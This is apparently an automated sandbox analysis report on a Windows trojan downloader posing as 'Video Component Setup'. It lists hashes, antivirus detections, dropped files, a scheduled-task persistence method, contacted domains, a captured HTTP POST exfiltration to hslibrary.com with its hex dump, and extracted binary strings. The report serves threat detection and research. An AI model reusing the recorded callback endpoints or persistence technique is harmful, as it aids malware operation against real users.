Analysis Date2014-11-28 08:58:22
MD5cb96986918ef9839d1aceeb1ea75bec6
SHA1f5e5b79bcee2f1382cd2fcc8b6c9c962c195aadc

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 40cc407b59aba5d1f7efe482f6ee4cb1 sha1: b935cf4945da5c22db86e64d4ab6bf22e94cc76e size: 9728
Section.data md5: a7850f32f8d0e3ed860dc4d48fe10105 sha1: 7026393b4c50302cf56120788aa11b60a3930b27 size: 12288
Section.edata md5: 96b806485c1999d140487a191988b31c sha1: 386eac78e67f8cb259ed06133f18cc95cae23b53 size: 101888
Section.idata md5: 610eb458fd63528f54cb127a09b9f675 sha1: a333939388d1cfcf427bb0904eada150fcf8666f size: 3072
Section.bdata md5: c99a74c555371a433d121f551d6c6398 sha1: 605db3fdbaff4ba13729371ad0c4fbab3889378e size: 2048
Section.rsrc md5: bccf0365d71ae03b007bf451335b957a sha1: a9a147792f489fe8321d36a8d41552c589390cf9 size: 8704
Timestamp2009-08-26 00:13:48
VersionLegalCopyright: Copyright © 2010 PC Tools. Hq All rights reserved. A
InternalName: OMoonY.exe
FileVersion: 3.0.0.612
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: E Z
ProductVersion: 3.0.0.612
FileDescription: Video Component Setup
OriginalFilename: OMoonY.exe
PEhashb51b30388f63934414ea3983eacc8b73ff0402ff
IMPhash46e072f11e3691ccda4a66cd2723b7ba
AV360 SafeTrojan.Generic.5860225
AVAd-AwareTrojan.Generic.5860225
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Heur.W32
AVAuthentiumW32/FakeAlert.NW.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen2
AVBullGuardTrojan.Generic.5860225
AVCA (E-Trust Ino)Win32/Renos.D!generic
AVCAT (quickheal)Trojan.Renos.LN
AVClamAVWin.Trojan.Fakeav-3512
AVDr. WebTrojan.DownLoader2.50040
AVEmsisoftTrojan.Generic.5860225
AVEset (nod32)Win32/Kryptik.NKY
AVFortinetW32/Diple.IZ!tr
AVFrisk (f-prot)W32/FakeAlert.NW.gen!Eldorado
AVF-SecurePacked:W32/TDSS.HZ
AVGrisoft (avg)no_virus
AVIkarusTrojan.Win32.Renos
AVK7Trojan ( 002572691 )
AVKasperskyTrojan-FakeAV.Win32.FlashApp.st
AVMalwareBytesTrojan.Downloader
AVMcafeeDownloader-CEW.ar
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PT
AVMicroWorld (escan)Trojan.Generic.5860225
AVRisingTrojan.Win32.Generic.1286FEDF
AVSophosMal/FakeAV-IZ
AVSymantecTrojan.FakeAV!gen52
AVTrend MicroTROJ_AGENT.SMAH
AVVirusBlokAda (vba32)SScope.Trojan.ExpProc.019

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\WINDOWS\Ojawia.exe
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FilePIPE\lsarpc
Creates ProcessC:\WINDOWS\Ojawia.exe
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Process
↳ C:\WINDOWS\Ojawia.exe

RegistryHKEY_CURRENT_USER\Software\ICS5R7Y0OS\OhuD ➝
5
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Creates FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes FileC:\WINDOWS\Tasks\{810401E2-DDE0-454e-B0E2-AA89C9E5967C}.job
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\{BC9BACEF-649A-45ff-A468-C000D051F283}

Network Details:

DNSkeezmovies.com
Type: A
31.192.116.179
DNSgoogle.ro
Type: A
173.194.125.56
DNSgoogle.ro
Type: A
173.194.125.63
DNSgoogle.ro
Type: A
173.194.125.55
DNSz5x.net
Type: A
62.128.56.34
DNShslibrary.com
Type: A
54.209.168.250
DNStopsaj.com
Type: A
DNShawfruit.com
Type: A
HTTP POSThttp://hslibrary.com/1wave.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 54.209.168.250:80

Raw Pcap
0x00000000 (00000)   504f5354 202f3177 6176652e 70687020   POST /1wave.php 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a43 6f6e7465 6e742d54   : */*..Content-T
0x00000030 (00048)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000040 (00064)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000050 (00080)   6e636f64 65640d0a 486f7374 3a206873   ncoded..Host: hs
0x00000060 (00096)   6c696272 6172792e 636f6d0d 0a557365   library.com..Use
0x00000070 (00112)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000080 (00128)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000090 (00144)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x000000a0 (00160)   6f777320 4e542035 2e30290d 0a436f6e   ows NT 5.0)..Con
0x000000b0 (00176)   74656e74 2d4c656e 6774683a 20333035   tent-Length: 305
0x000000c0 (00192)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x000000d0 (00208)   6f73650d 0a436163 68652d43 6f6e7472   ose..Cache-Contr
0x000000e0 (00224)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000f0 (00240)   64617461 3d652f65 3672354a 5a523130   data=e/e6r5JZR10
0x00000100 (00256)   4669776f 474c6735 31516743 39686e62   FiwoGLg51QgC9hnb
0x00000110 (00272)   45786f32 31617433 614f5967 73552f48   Exo21at3aOYgsU/H
0x00000120 (00288)   4c6b7a66 33637577 70447452 7379352b   Lkzf3cuwpDtRsy5+
0x00000130 (00304)   65305a5a 5237336c 4558787a 39485464   e0ZZR73lEXxz9HTd
0x00000140 (00320)   54367833 30656463 7364774d 4a4f6441   T6x30edcsdwMJOdA
0x00000150 (00336)   462f566a 56735748 46304579 377a444a   F/VjVsWHF0Ey7zDJ
0x00000160 (00352)   57392f73 394a4572 4a307066 72383251   W9/s9JErJ0pfr82Q
0x00000170 (00368)   59366238 48436753 754e6155 71696734   Y6b8HCgSuNaUqig4
0x00000180 (00384)   6f563342 42774b32 74327a37 33524765   oV3BBwK2t2z73RGe
0x00000190 (00400)   7955446a 67737548 4670434c 4f696b52   yUDjgsuHFpCLOikR
0x000001a0 (00416)   50534c39 536a7550 31494238 624b706a   PSL9SjuP1IB8bKpj
0x000001b0 (00432)   746d4a30 69673356 6d566346 38616f4f   tmJ0ig3VmVcF8aoO
0x000001c0 (00448)   72425252 43796462 4b50674f 69452f6b   rBRRCydbKPgOiE/k
0x000001d0 (00464)   7a6a674d 76414543 6d564362 664b724e   zjgMvAECmVCbfKrN
0x000001e0 (00480)   6536576c 4867686b 45546a2f 6b477638   e6WlHghkETj/kGv8
0x000001f0 (00496)   46363055 52444d50 686e3470 64494144   F60URDMPhn4pdIAD
0x00000200 (00512)   71467842 482f3466 66384572 69676c32   qFxBH/4ff8Erigl2
0x00000210 (00528)   55597753 6c657234 48437838 32415a67   UYwSler4HCx82AZg
0x00000220 (00544)   46                                    F


Strings
i.3.
..
@
.{.
...
.
.h.
..
E=3.
040904E4
 2010  PC Tools. Hq All rights reserved. A
3.0.0.612
7euM
9ugD
&About
Alt+
ANSI
ASCII
BBABORT
BBALL
BBCANCEL
BBCLOSE
BBHELP
BBIGNORE
BBNO
BBOK
BBRETRY
BBYES
BCD overflow
Big Endian Unicode
Comments
CompanyName
Copyright 
Ctrl+
Down
eo2iR
E&xit
&File
FileDescription
FileVersion
InternalName
Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid SQL date/time values
LegalCopyright
LegalTrademarks
LError loading dock zone from the stream. Expecting version %d, but found %d.#No OnGetItem event handler assigned
MAINMENU
OMoonY.exe
&Open
OriginalFilename
PREVIEWGLYPH
ProductName
ProductVersion
Remote Login
Right
Shift+
%s is not a valid BCD value$Could not parse SQL TimeStamp string
StringFileInfo
Translation
U9t6
Unicode
UTF-7
UTF-8
VarFileInfo
Video Component Setup
videosoft
VS_VERSION_INFO
zfvn
1cT,H4]S
1fYo+z)E
>&1,Wu
|1zNf+
2""333:"C8
2""#33:DC8
2aWjWhHq
2$B""""C38
2C4"""D338
,2<d0OH[
@2$dDO(ZH
`2Hddt
2ldttX
_2r6uN2Oee@8
3:"""""
:33:"$
"*"$33
3333:"$
33333?
333333
333333?
3333333
$3333333
#3333333
33333333
33333333333
333333333333
333333333333?
33333333?333333
333333333333333
333333333333333333
3333333333333338
3333333:3333333383
333333:"33333338
3333333333338
33333:"$3333338
3333:"$3333338
3333339
333333:"C3333338
333333DDD3
333338
33333833
:*3:"$3338
#33338
33338?383
3333Dc3333333
3333f3333333?
3333fc33333338
3333>fd333338
3334JC33333338?333
3336Dc3333338
3336fC3333338
:*"*"$3338
333838
333*C33
333DDD33333?
333>fC333333
333>fd333333
$334B"$3
334C33333338
33B$3333333
33DDDDD3333
33fd3>fC333
33>ffffc338
34""C33333833
3B""$33333
$3q^%b
!\}3Srl
%3y*L<X40
4"*""C3338
; 4c%t
4DF334DC33
4=	Mw>SFs
4rUaVS
5D80C{)y
5q)LYR
;5qQt"hS
5%z0<4$
\6d4fV7
6 <F?!
'6_f95_
6SYGlpq
6?@&@~VXn
6XF+`{
7exWuME
7GP1-H
7Kmj21aKJ6Jg
7LO|[K
 8as-'dvzd
8Bw5pR
8cNH-g
8ePC29
/9P[:T]
a6 H4GZ_
AdjustWindowRectEx
ADVAPI32.dll
'"ak*s
	av+LS
aw?q(K4t
aXDs$^
#B3st(U
-b/]&4
B;5\6w
b6Hv^=
.B8Juj
@.bdata
BEI"P"D
BhCwUa
<!b\J4y
BOb_nDhu
BZ]wvH
:"C333
"$c33333
c333333
"C333333
C3333333
C33333833?33
"C3338
c33*C333
"C8338
c)buJ@
CharNextW
CharToOemA
CharUpperA
CheckMenuItem
ChildWindowFromPoint
cI^Ad~+
CjC338
CJharW
CloseClipboard
CreateMenu
CS%_T,
c\w8RTyd&
CY*>!r
`.data
"dc3333833
D*C33383
:DC33:""$8
!dc^*eVw
"DDB""$3
d?D_ftKoT
DefFrameProcA
DeleteCriticalSection
DestroyCursor
[dOew_
dR,~7j
DrawFrameControl
DrawIcon
DrawIconEx
`[@DUt
DwL2PdXr
DYG{ZgjF
E3#$YdlW
Eagvps
.edata
_efiA0z3mtd57J@16
egrfCKM
EmptyClipboard
EnableScrollBar
EndDialog
EnterCriticalSection
EnumChildWindows
EO[G8A7
EPo9tH)\ag
EqualRect
E^_[~t;
ExitProcess
E*YAzn8
`eyG<gE]
f2W$4~
,f35d^>oGD
fC333?3
fC33333
fDFfC338
F*F333383
fff3333
#\F'G7N
FillRect
$fKZj	
{^]fQp4
F,tN`xj
FU7dLz
fup/<JG
fU P`.rJdat
^'*?}g
G98\7654r\:\
gakC7hNp
gEAmGeEN
GetCurrentProcessId
GetDCEx
GetDesktopWindow
GetEnvironmentStrings
GetFileType
GetFocus
GetiPrXcAdk
GetKeyboardLayoutList
GetKeyboardState
GetMenu
GetMenuItemCount
GetMenuItemInfoA
GetMessagePos
GetModuleFileNameA
GetStdHandle
GetSysColorBrush
GetTickCount
GetTopWindow
GetVersionExA
GetWindowTextLengthA
GetWindowThreadProcessId
>#"g:FE
ggI6WN
gHjqurv
GlobalAddAtomA
GlobalAlloc
GlobalFindAtomA
_g;N1~
gs\w;&
GvFK0u4
h6(1M:26P
H$B}Jw
HeapAlloc
h>J%&{
^HlP^_
HObYAg9
\HtxGL^|
@.idata
ij:}r 
ip {_,9,
IsCharUpperA
IsDialogMessageA
IsWindowEnabled
ivX[Yd
Iw{/XY
"J333333
"J"C3333
jD?f9	
jJY3l|y
^_$JwU^
K2$lw$'$[
K3!-sv
KERNEL32.dll
/KL|yh
KRV f> ,
K)_TJFt
L^@2?Yua
>Lc;FP
lfr~SEHLW
lHTym5
LoadIconA
LoadKeyboardLayoutA
LoadLibraryA
LoadStringA
|$lQ@-
lstrcatA
lstrcmpiA
LtRUv	 
~^,@'M
main.cpl
MapWindowPoints
mJ07^@Z
mKH9y!
MoveWindow
MSVCDP60
`MtXQH
@#@MvK
mwT^l43
MwxCu6
+$*N/0
>{N7XF
nCl1vnPke
n>Ub,PW
n~w gGK
*:|O_6
^oKut_Jf
OMoonY.exe
OpenClipboard
ORB\1RJ	7
OSLEAUT5
oUAxHf
ow|:>-
ozroo~7
P01j~GWUNIQSTR
P24dTO8ZX
p2LdtOPZx
<pC4<q0
+p,DE3
PKDf. 
[pmAtp
p%Ng9|u
PRG%s_
(P$T R
PUd!!1
pv/FX4
pV+iBwOf7&
qb_Ov&3
_qCx@F
Qt0oP;Lg
Q~t$O,G6
(^QZ">
'r.6BBn
R8Jvdz1lrwE@8
r{!A=R
ReadFile
RegCreateKeyExA
RegisterClassA
RegOpenKeyExA
ReleaseCapture
ReleaseDC
RemoveMenu
RemovePropA
rj_IwDv[
R@Qm6t
rs[#D!
@.rsrc
s2\6A|
s4bF4^=oED
ScreenToClient
SD5CfY
s@dFHr
SendMessageW
SetActiveWindow
SetCapture
SetClassLongA
SetEndOfFile
SetErrorMode
SetEvent
SetPropA
SetScrollInfo
SetScrollRange
SetWindowsHookExA
sfbF4^oowJ
:SFJd_
ShowWindow
s%}JY;
sMbF4^Vo^D
S]v$/}
s\v}U~
SWbHXs
	|]sY:
_t?#`%
Tb<YF_^
Td^]ofD
t^g8]F
This program must be run under Win32
-TIckC
t|*.i>f
TIOS	X
t=n\+6"
tPdUDuJ7|
TrackPopupMenu
TranslateMessage
T|/\r_U
?T|Y`2?`
$@u] 2Y
U3qsl^%
uHGh1*
uhH@ejO_
_UlQ`k
uM'pYu(/
_ur<WCF7f9
USER32.dll
uw5b8wE
v\2]D`
V\'B/)
+<v EJ
Vg"7FD
VirtualAllocEx
VirtualFree
vP?20_
VpPp3h
Vq$2"q
VrUYVlQe
vVBK/;
VxZsionJ
WaitMessage
W{Apr 
;*we=9
,[wGW^
WindowFromPoint
wjXK65
W~<L&>
\!	WL8
 ~WL(FO
$wonJe
WP9R.[
W-u;`3
$X8Et|
xCQVXeMCD
XE8x/9D
/	xgSf6
+(,xhj{^(
XQQSPA+
x[_tqRx
xvn|A"h
y^:`^d
Y lj::p
'Yxt;u
~zD(7Q
$ZdrnQ;
_zF8Q4
\|Zr>vE
Z?VQ|u5@
Zw>;)2p
ZyTaXMX